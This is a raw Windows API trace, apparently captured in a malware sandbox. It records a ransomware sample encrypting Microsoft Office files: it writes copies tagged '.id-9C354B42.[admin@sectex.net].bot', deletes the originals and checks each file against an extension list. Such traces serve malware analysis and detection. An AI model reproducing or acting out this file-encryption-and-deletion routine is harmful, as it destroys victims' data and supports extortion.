	[0147.826] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.876] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mso.acl")) returned 1
	[0147.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.876] lstrlenW (lpString=".doc") returned 4
	[0147.877] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".docx") returned 5
	[0147.877] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0147.877] lstrlenW (lpString=".pdf") returned 4
	[0147.877] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".xls") returned 4
	[0147.877] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".xlsx") returned 5
	[0147.877] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0147.877] lstrlenW (lpString=".ppt") returned 4
	[0147.877] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.877] lstrlenW (lpString=".zip") returned 4
	[0147.877] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".rar") returned 4
	[0147.877] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".bz2") returned 4
	[0147.877] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString=".7z") returned 3
	[0147.877] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0147.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.877] lstrlenW (lpString=".dbf") returned 4
	[0147.877] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.877] lstrlenW (lpString=".1cd") returned 4
	[0147.877] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0147.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.877] lstrlenW (lpString=".jpg") returned 4
	[0147.877] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0147.877] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString=".doc") returned 4
	[0147.878] lstrcmpiW (lpString1=".doc", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".docx") returned 5
	[0147.878] lstrcmpiW (lpString1=".docx", lpString2="O.ACL") returned -1
	[0147.878] lstrlenW (lpString=".pdf") returned 4
	[0147.878] lstrcmpiW (lpString1=".pdf", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".xls") returned 4
	[0147.878] lstrcmpiW (lpString1=".xls", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".xlsx") returned 5
	[0147.878] lstrcmpiW (lpString1=".xlsx", lpString2="O.ACL") returned -1
	[0147.878] lstrlenW (lpString=".ppt") returned 4
	[0147.878] lstrcmpiW (lpString1=".ppt", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString=".zip") returned 4
	[0147.878] lstrcmpiW (lpString1=".zip", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".rar") returned 4
	[0147.878] lstrcmpiW (lpString1=".rar", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".bz2") returned 4
	[0147.878] lstrcmpiW (lpString1=".bz2", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString=".7z") returned 3
	[0147.878] lstrcmpiW (lpString1=".7z", lpString2="ACL") returned -1
	[0147.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString=".dbf") returned 4
	[0147.878] lstrcmpiW (lpString1=".dbf", lpString2=".ACL") returned 1
	[0147.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString=".1cd") returned 4
	[0147.878] lstrcmpiW (lpString1=".1cd", lpString2=".ACL") returned -1
	[0147.878] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSO.ACL") returned 55
	[0147.878] lstrlenW (lpString=".jpg") returned 4
	[0147.878] lstrcmpiW (lpString1=".jpg", lpString2=".ACL") returned 1
	[0147.879] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0147.879] lstrlenW (lpString="MSOUC_COL.HXC") returned 13
	[0147.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.879] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=621) returned 1
	[0147.879] CloseHandle (hObject=0x3c8) returned 1
	[0147.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc")) returned 0x20
	[0147.879] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.880] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.880] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0147.880] GetLastError () returned 0x0
	[0147.880] ReadFile (in: hFile=0x3c8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x26d, lpOverlapped=0x0) returned 1
	[0147.939] WriteFile (in: hFile=0x2a0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x270, lpOverlapped=0x0) returned 1
	[0147.940] ReadFile (in: hFile=0x3c8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.940] WriteFile (in: hFile=0x2a0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0147.940] SetEndOfFile (hFile=0x2a0) returned 1
	[0147.940] CloseHandle (hObject=0x2a0) returned 1
	[0147.940] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.940] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.943] CloseHandle (hObject=0x3c8) returned 1
	[0147.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_col.hxc")) returned 1
	[0147.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.944] lstrlenW (lpString=".doc") returned 4
	[0147.944] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0147.944] lstrlenW (lpString=".docx") returned 5
	[0147.944] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0147.944] lstrlenW (lpString=".pdf") returned 4
	[0147.944] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0147.944] lstrlenW (lpString=".xls") returned 4
	[0147.944] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0147.944] lstrlenW (lpString=".xlsx") returned 5
	[0147.944] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0147.944] lstrlenW (lpString=".ppt") returned 4
	[0147.944] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0147.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.944] lstrlenW (lpString=".zip") returned 4
	[0147.944] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0147.944] lstrlenW (lpString=".rar") returned 4
	[0147.944] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0147.944] lstrlenW (lpString=".bz2") returned 4
	[0147.944] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0147.944] lstrlenW (lpString=".7z") returned 3
	[0147.944] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0147.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.944] lstrlenW (lpString=".dbf") returned 4
	[0147.944] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0147.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.944] lstrlenW (lpString=".1cd") returned 4
	[0147.944] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.945] lstrlenW (lpString=".jpg") returned 4
	[0147.945] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.945] lstrlenW (lpString=".doc") returned 4
	[0147.945] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0147.945] lstrlenW (lpString=".docx") returned 5
	[0147.945] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0147.945] lstrlenW (lpString=".pdf") returned 4
	[0147.945] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString=".xls") returned 4
	[0147.945] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString=".xlsx") returned 5
	[0147.945] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0147.945] lstrlenW (lpString=".ppt") returned 4
	[0147.945] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.945] lstrlenW (lpString=".zip") returned 4
	[0147.945] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString=".rar") returned 4
	[0147.945] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0147.945] lstrlenW (lpString=".bz2") returned 4
	[0147.945] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0147.945] lstrlenW (lpString=".7z") returned 3
	[0147.945] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.945] lstrlenW (lpString=".dbf") returned 4
	[0147.945] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0147.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.946] lstrlenW (lpString=".1cd") returned 4
	[0147.946] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0147.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_COL.HXC") returned 61
	[0147.946] lstrlenW (lpString=".jpg") returned 4
	[0147.946] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0147.946] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0147.946] lstrlenW (lpString="MSOUC_F_COL.HXK") returned 15
	[0147.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0147.995] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=114) returned 1
	[0147.995] CloseHandle (hObject=0x3c4) returned 1
	[0147.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk")) returned 0x20
	[0148.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.092] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.092] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.093] GetLastError () returned 0x0
	[0148.093] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x72, lpOverlapped=0x0) returned 1
	[0148.094] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.095] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.095] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.095] SetEndOfFile (hFile=0x388) returned 1
	[0148.095] CloseHandle (hObject=0x388) returned 1
	[0148.095] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.095] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.097] CloseHandle (hObject=0x3b0) returned 1
	[0148.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.098] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_f_col.hxk")) returned 1
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString=".doc") returned 4
	[0148.099] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.099] lstrlenW (lpString=".docx") returned 5
	[0148.099] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.099] lstrlenW (lpString=".pdf") returned 4
	[0148.099] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.099] lstrlenW (lpString=".xls") returned 4
	[0148.099] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.099] lstrlenW (lpString=".xlsx") returned 5
	[0148.099] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.099] lstrlenW (lpString=".ppt") returned 4
	[0148.099] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString=".zip") returned 4
	[0148.099] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.099] lstrlenW (lpString=".rar") returned 4
	[0148.099] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.099] lstrlenW (lpString=".bz2") returned 4
	[0148.099] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.099] lstrlenW (lpString=".7z") returned 3
	[0148.099] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString=".dbf") returned 4
	[0148.099] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString=".1cd") returned 4
	[0148.099] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.099] lstrlenW (lpString=".jpg") returned 4
	[0148.099] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString=".doc") returned 4
	[0148.100] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0148.100] lstrlenW (lpString=".docx") returned 5
	[0148.100] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0148.100] lstrlenW (lpString=".pdf") returned 4
	[0148.100] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString=".xls") returned 4
	[0148.100] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString=".xlsx") returned 5
	[0148.100] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0148.100] lstrlenW (lpString=".ppt") returned 4
	[0148.100] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString=".zip") returned 4
	[0148.100] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString=".rar") returned 4
	[0148.100] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0148.100] lstrlenW (lpString=".bz2") returned 4
	[0148.100] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0148.100] lstrlenW (lpString=".7z") returned 3
	[0148.100] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString=".dbf") returned 4
	[0148.100] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString=".1cd") returned 4
	[0148.100] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0148.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_F_COL.HXK") returned 63
	[0148.100] lstrlenW (lpString=".jpg") returned 4
	[0148.100] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0148.101] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0148.101] lstrlenW (lpString="MSOUC_K_COL.HXK") returned 15
	[0148.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.101] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=113) returned 1
	[0148.101] CloseHandle (hObject=0x3b0) returned 1
	[0148.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk")) returned 0x20
	[0148.101] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0148.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0148.102] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.102] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0148.103] GetLastError () returned 0x0
	[0148.103] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x71, lpOverlapped=0x0) returned 1
	[0148.103] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0148.104] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.104] WriteFile (in: hFile=0x388, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0148.104] SetEndOfFile (hFile=0x388) returned 1
	[0148.105] CloseHandle (hObject=0x388) returned 1
	[0148.105] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.105] SetEndOfFile (hFile=0x3b0) returned 1
	[0148.107] CloseHandle (hObject=0x3b0) returned 1
	[0148.107] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.107] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\msouc_k_col.hxk")) returned 1
	[0148.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSOUC_K_COL.HXK") returned 63
	[0148.108] lstrlenW (lpString=".doc") returned 4
